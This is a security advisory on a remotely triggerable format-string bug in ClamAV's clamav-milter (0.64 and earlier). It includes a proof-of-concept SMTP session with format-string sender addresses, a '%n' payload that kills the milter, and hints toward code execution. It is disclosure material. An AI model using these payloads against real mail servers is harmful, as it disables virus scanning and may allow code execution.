Clam AntiVirus is "an anti-virus toolkit for UNIX. The main purpose of the software is to integrate with mail servers for attachment scanning. Clam Antivirus works with Linux, Solaris, FreeBSD, OpenBSD, NetBSD, AIX, Mac OS X, and Cygwin B20".
Snapshot clamav-devel-20031111 and clamav-0.65 fix a potentially exploitable format string issue that can be triggered by a remote attacker. Only versions above clamav-0.54 that include syslog() functionality are vulnerable to this attack. CVS snapshots up to but not including version clamav-devel-20031111 may be vulnerable to attack. Versions clamav-0.60 throughout clamav-0.60p are confirmed to be at least exploitable for a DoS condition. This issue only poses a problem for clamav-milter users.
Vulnerable systems:
* Clam AntiVirus version 0.64 and prior
Immune systems:
* Clam AntiVirus version 0.65
In order to exploit this condition clamav must be configured with syslog. Your clamav.conf must have the following setup: # Use system logger (can work together with LogFile).
LogSyslog
Both clamd, clamav-milter and Sendmail must be running. [root@RiotStarter root]# ps -x| grep clam
6228 ? S 0:00 clamd
19118 ? S 0:00 clamav-milter -blo /var/run/clmilter.sock
In the event a virus rule is triggered the following code is run by clamav-milter. This code simply passes the senders email address to syslog().
To see this bug in action simply tail your maillog and use the below example.
[root@RiotStarter root]# tail -f /var/log/maillog
clamav-milter[]: stream: ClamAV-Test-Signature FOUND
...
clamav-milter[]: Intercepted virus from: AAAABBBB41414141.42424242 to: root
This message was caused by the following.
bash-2.05b$ nc localhost 25
220 localhost.localdomain ESMTP Sendmail 8.12.10/8.12.10; Wed, 12 Nov
2003 00:16:52 -0500
helo ClamAV_DoS_Potential_Exploit
250 localhost.localdomain Hello RiotStarter [127.0.0.1], pleased to meet you
mail from: AAAABBBB%09$x.%10$x
250 2.1.0 AAAABBBB%09$x.%10$x... Sender ok
rcpt to: root
250 2.1.5 root... Recipient ok
data
354 Enter mail, end with "." on a line by itself
$CEliacmaTrESTuScikgsn$FREE-TEST-SIGNATURE$EEEEE$
.
550 5.7.1 Virus detected by ClamAV - http://clamav.elektrapro.com
We made use of an antivirus test string in order to trigger the alert. This alert caused the from address to be passed directly to syslog() with out any format specifier.
This issue may potentially be used to run code as either the clamav user or root depending on how clamav is configured. At the very least a DoS attack on clamav-milter can be caused by using "mail from: %n%n%n%n%n%n%n".
Instead of Virus detected by ClamAv... you will see: 250 2.0.0 hAC5K2Y0019453 Message accepted for delivery
If you check the ps list you will note that the clamav-milter is now dead
From this point on messages are no longer being scanned by clamav. When attempting to exploit this issue an attacker must take care to use printable characters. Vanilla double write style exploitation may not be possible because of this. Popping items off the stack may still yield an interesting address to write to.
Upon writing an invalid address you will see something similar to the following. 501 5.1.7 Syntax error in mailbox address "D'??F'??%09$hn.@10$hn"
(non-printable character)
Vendor Status:
Promptly attended to the issue. Patched clamav-milter is available in clamav-devel-20031111 and clamav-0.65
